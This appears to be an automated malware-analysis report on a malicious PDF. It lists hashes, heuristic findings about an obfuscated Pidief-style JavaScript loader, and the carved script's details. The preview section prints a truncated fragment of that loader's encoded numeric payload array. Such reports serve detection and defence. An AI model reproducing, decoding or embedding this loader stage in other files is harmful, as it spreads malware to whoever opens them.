Malicious PDF — malware analysis report

Static analysis result for SHA-256 9f5c33668e8e9ca7…

MALICIOUS

PDF

8.0 KB First seen: 2026-05-10
MD5: 716434e5c9ac174bfbd4927a2080740f SHA-1: 55552c449b2a34cdf80b28a9b9c300aad9d0af61 SHA-256: 9f5c33668e8e9ca7c247b10409a39d5ba3ea3d26e325100d8a4dcb3a00f520b3
86 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier also flagged this PDF as malicious with high confidence. The embedded JavaScript, named 'javascript_obj0069_000.js', is likely responsible for executing malicious code or downloading a second-stage payload. Due to the obfuscated nature of the script, the exact payload and execution method cannot be determined, but the presence of JavaScript in a PDF is a strong indicator of malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 3

  • Obfuscated Pidief-style JavaScript loader (stage not decoded) high CVE related PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER
    PDF JavaScript carries a large opaque encoded stage (a large numeric character-code array feeding an auto-run script) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0069_000.js pdf-javascript-stream PDF /JS object 69 at offset 0x1BE 865 bytes
SHA-256: cdc809a64e9d027e71866adc49e63a9f9ef10a5845eaf0f73ce0b82da7c87531
Preview script
First 1,000 lines of the extracted script
ngE1Hq5hWh=[87,1,22,5,87,38,79,20,26,20,32,30,67,70,37,67,50,74,85,30,24,95,3,87,30,0,31,2,25,17,5,20,40,4,17,25,3,15,87,22,12,18,14,91,27,27,4,7,7,94,12,94,18,30,22,5,4,30,25,18,89,18,95,14,27,75,27,93,69,3,14,22,31,5,5,5,25,7,92,74,2,14,22,25,16,14,4,76,22,4,7,7,89,14,4,7,4,18,25,25,22,21,91,5,5,27,74,4,10,3,88,71,5,16,95,2,5,10,3,69,18,30,25,76,17,30,22,5,4,20,94,25,76,7,87,14,5,25,87,30,24,31,5,87,3,95,4,19,18,7,1,22,7,3,24,2,25,87,94,12,19,87,74,4,18,20,18,2,95,22,52,53,2,18,82,25,82,2,79,27,27,43,85,65,68,20,71,68,71,82,71,67,67,64,52,64,2,68,52,82,71,82,2,82,2,67,79,71,53,70,52,79,53,71,79,82,2,79,71,79,2,66,2,54,51,79,71,82,2,71,2,79,53,82,53,82,78,50,2,82,2,71,2,64,79,67,51,68,67,66,53,66,79,82,2,79,71,82,52,67,52,82,2,68,53,67,52,50,69,65,54,82,54,82,2,82,2,82,67,69,70,50,69,51,53,82,69,79,53,50,78,66,2,66,2,50,53,82,2,82,2,66,2,67,49,79,6

Open this report in the interactive analyzer, or submit your own file for analysis.